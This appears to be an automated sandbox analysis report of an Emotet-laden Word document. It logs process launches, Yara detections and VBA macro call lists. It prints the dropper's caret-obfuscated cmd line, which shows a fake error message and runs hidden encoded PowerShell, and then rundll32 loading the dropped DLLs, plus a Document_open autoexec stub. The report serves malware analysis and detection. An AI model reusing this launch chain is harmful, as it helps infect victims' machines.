• OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034

                                                                      System Behavior

                                                                      General

                                                                      Start time:12:17:33
                                                                      Start date:27/01/2021
                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                      Imagebase:0x13f890000
                                                                      File size:1424032 bytes
                                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:17:35
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                                                                      Imagebase:0x4a950000
                                                                      File size:345088 bytes
                                                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:17:35
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\msg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:msg user /v Word experienced an error trying to open the file.
                                                                      Imagebase:0xff490000
                                                                      File size:26112 bytes
                                                                      MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:17:36
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -w hidden -enc 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
                                                                      Imagebase:0x13fec0000
                                                                      File size:473600 bytes
                                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      General

                                                                      Start time:12:17:47
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                                                                      Imagebase:0xff9b0000
                                                                      File size:45568 bytes
                                                                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:17:48
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2113528268.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2113590423.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:17:52
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2127750584.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2124233296.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2124067211.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:17:58
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2133960367.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2134645958.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2134026009.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:02
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2148272205.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2149995465.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:09
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2157336224.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2157365734.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2159945715.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:13
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2168489304.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2170332868.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2168457347.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:18
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2180397123.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2177327005.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2177340948.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:22
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2188156936.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2188168029.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:27
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2197905867.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2198949244.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2197927518.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:12:18:32
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2210754308.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2208025145.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2208036737.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security

                                                                      General

                                                                      Start time:12:18:37
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2217818929.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2217846238.0000000000240000.00000040.00000001.sdmp, Author: Joe Security

                                                                      General

                                                                      Start time:12:18:41
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2336963149.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Module: Bcur5699z4d

                                                                      Declaration
                                                                      Attribute VB_Name = "Bcur5699z4d"
                                                                      Attribute VB_Base = "1Normal.ThisDocument"
                                                                      Attribute VB_GlobalNameSpace = False
                                                                      Attribute VB_Creatable = False
                                                                      Attribute VB_PredeclaredId = True
                                                                      Attribute VB_Exposed = True
                                                                      Attribute VB_TemplateDerived = True
                                                                      Attribute VB_Customizable = True

                                                                      Executed Functions
                                                                      APIs | Meta Information


                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: RmTjACo

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: zjQpkF

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: ClofCvn

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: tFspDCJEJ

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: CreateObject

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: rknGHpIJ

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: LGONCIz

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: chPFBOFy

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Mid

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Create

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Twt08i5xpa9fd0

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: L1e1dxo2wbinf3l6

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: rlKgn

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: igIuH

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: QgrUG

                                                                      Line   Instruction                   Meta Information
                                                                      9      Private Sub Document_open()
                                                                      10     Xqcxarraokjbi                 executed
                                                                      11     End Sub

                                                                      Module: Nst6otvnmgmpw

                                                                      Declaration
                                                                      Line   Content
                                                                      1      Attribute VB_Name = "Nst6otvnmgmpw"

                                                                      Executed Functions
                                                                      APIs   Meta Information

                                                                      O9eax2mx6bn5xuv

                                                                      Content

                                                                      Bud375u79tqnjtr8hp

                                                                      bebkDqAH

                                                                      Paragraphs

                                                                      EWTFmUdCA

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      ueWFHDCC

                                                                      yigPu

                                                                      Paragraphs

                                                                      wTLHBUFzI

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      oSnKJGCv

                                                                      NVFQOFAXs

                                                                      Paragraphs

                                                                      KoPDIC

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      vlZuYFCC

                                                                      mJzxEXG

                                                                      Paragraphs

                                                                      bssipAJC

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      IpndaHM

                                                                      Mid

                                                                      Name

                                                                      Application

                                                                      lscaG

                                                                      Paragraphs

                                                                      wgusFA

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      HpOdl

                                                                      PAyxzTsC

                                                                      Paragraphs

                                                                      sVBjGLE

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      RmTjACo

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: nWADOALQ

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: EqstFcEf

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: CITOv

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: swJREBktH

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: MllKTIJEc

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: fishDz

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: xvhwEkIi

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: vYqwDI

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: MFcvbrIeP

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: HmUuEIbVG

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: gzBJqD

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Yvxv3g2kutodnaylkq@Nst6otvnmgmpw: polxC

                                                                      zjQpkF

                                                                      Paragraphs

                                                                      ClofCvn

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

